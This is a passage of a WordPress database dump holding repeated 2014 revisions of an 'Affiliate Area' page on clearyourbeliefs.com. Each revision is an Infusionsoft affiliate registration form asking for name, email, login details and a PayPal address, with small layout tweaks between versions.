/>\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 15:57:26', '2014-07-12 20:57:26', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1272, 4194, '2014-07-12 16:03:10', '2014-07-12 21:03:10', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n\r\n<div class="infusion-field">\r\n\r\n<td><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:03:10', '2014-07-12 21:03:10', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1273, 4194, '2014-07-12 16:04:35', '2014-07-12 21:04:35', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table>\r\n<tr colspan="2">\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n\r\n<div class="infusion-field">\r\n\r\n<td><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:04:35', '2014-07-12 21:04:35', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1274, 4194, '2014-07-12 16:06:22', '2014-07-12 21:06:22', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n\r\n<div class="infusion-field">\r\n\r\n<td><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:06:22', '2014-07-12 21:06:22', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1276, 4194, '2014-07-12 16:15:28', '2014-07-12 21:15:28', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:15:28', '2014-07-12 21:15:28', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1275, 4194, '2014-07-12 16:07:46', '2014-07-12 21:07:46', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n\r\n<div class="infusion-field">\r\n\r\n<td><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td><label for="inf_custom_PaypalEmailAddress" style="float:right;">Paypal Email Address *</label></td>\r\n\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:07:46', '2014-07-12 21:07:46', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1277, 4194, '2014-07-12 16:16:20', '2014-07-12 21:16:20', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:16:20', '2014-07-12 21:16:20', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1278, 4194, '2014-07-12 16:17:01', '2014-07-12 21:17:01', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:17:01', '2014-07-12 21:17:01', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1279, 4194, '2014-07-12 16:19:32', '2014-07-12 21:19:32', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name 